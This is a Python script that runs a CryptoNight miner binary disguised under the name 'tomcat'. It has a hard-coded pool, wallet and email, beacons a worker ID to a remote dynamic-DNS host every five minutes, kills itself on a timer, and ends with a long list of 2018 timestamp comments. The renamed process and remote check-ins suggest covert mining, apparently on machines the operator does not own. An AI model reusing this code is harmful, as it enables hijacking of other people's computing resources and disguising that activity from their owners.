import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:05.019023
#2018-02-17 17:36:01.618129
#2018-02-17 19:24:02.233487
#2018-02-17 21:12:07.740729
#2018-02-17 22:56:07.901001
#2018-02-18 00:42:07.526179
#2018-02-18 02:32:01.770724
#2018-02-18 04:19:05.436434
#2018-02-18 06:10:07.654007
#2018-02-18 08:01:05.341570
#2018-02-18 09:48:06.675936
#2018-02-18 11:35:01.298992
#2018-02-18 13:20:05.918410
#2018-02-18 15:10:04.272109
#2018-02-18 16:58:06.666172
#2018-02-18 18:46:04.994856
#2018-02-18 20:33:07.384546
#2018-02-18 22:19:01.930863
#2018-02-19 00:08:07.098204
#2018-02-19 01:55:01.498251
#2018-02-19 03:41:09.249831
#2018-02-19 05:26:06.547127
#2018-02-19 07:14:07.140262
#2018-02-19 09:02:06.248803
#2018-02-19 10:50:10.230015
#2018-02-19 12:38:01.946043
#2018-02-19 14:27:01.738062
#2018-02-19 16:16:01.795746
#2018-02-19 18:04:07.036591
#2018-02-19 19:50:07.351876
#2018-02-19 21:37:07.931956
#2018-02-19 23:25:04.873874
#2018-02-20 01:12:03.565173
#2018-02-20 03:03:05.898716
#2018-02-20 04:51:07.055295
#2018-02-20 06:34:07.163062
#2018-02-20 08:19:07.022520
#2018-02-20 10:04:07.830570
#2018-02-20 11:49:01.512551
#2018-02-20 13:37:05.008197
#2018-02-20 15:21:05.793345
#2018-02-20 17:07:09.359920
#2018-02-20 18:56:05.047294
#2018-02-20 22:27:07.546825
#2018-02-21 00:07:07.725588
#2018-02-21 01:53:01.529948
#2018-02-21 03:41:07.830970
#2018-02-21 05:29:06.955743
#2018-02-21 07:18:01.860019
#2018-02-21 09:02:06.179764
#2018-02-21 10:50:11.778380
#2018-02-21 12:37:08.368241
#2018-02-21 14:24:05.422726
#2018-02-21 16:11:08.791508
#2018-02-21 18:01:09.138689
#2018-02-21 19:49:05.148194
#2018-02-21 21:36:02.028105
#2018-02-21 23:24:01.798793
#2018-02-22 01:14:01.501150
#2018-02-22 03:03:07.337127
#2018-02-22 04:48:02.095147
#2018-02-22 06:32:06.621104
#2018-02-22 08:19:06.445479
#2018-02-22 10:08:07.941072
#2018-02-22 11:53:11.119721
#2018-02-22 13:38:09.039302
#2018-02-22 15:26:08.679427
#2018-02-22 17:13:08.914444
#2018-02-22 19:01:08.060034
#2018-02-22 20:53:04.498035
#2018-02-22 22:39:05.780203
#2018-02-23 00:26:04.124208
#2018-02-23 02:13:06.778424
#2018-02-23 04:02:07.520394
#2018-02-23 05:48:01.794486
#2018-02-23 07:29:06.393040
#2018-02-23 09:34:08.619421
#2018-02-23 11:40:03.720201
#2018-02-23 13:31:08.657092
#2018-02-23 15:17:09.408998
#2018-02-23 17:06:09.580600
#2018-02-23 18:37:05.243286
#2018-02-23 20:20:08.280018
#2018-02-23 21:53:04.776417
#2018-02-23 23:32:04.558038
#2018-02-24 01:06:04.341974
#2018-02-24 02:45:08.145878
#2018-02-24 04:22:07.382035
#2018-02-24 06:08:07.601677
#2018-02-24 07:56:06.444096
#2018-02-24 09:41:01.423075
#2018-02-24 11:36:01.389066
#2018-02-24 13:26:05.144958
#2018-02-24 15:15:08.484937
#2018-02-24 17:04:06.139404
#2018-02-24 18:57:05.230954
#2018-02-24 20:44:06.369563
#2018-02-25 01:19:01.856291
#2018-02-25 05:19:04.495937
#2018-02-25 11:27:02.126458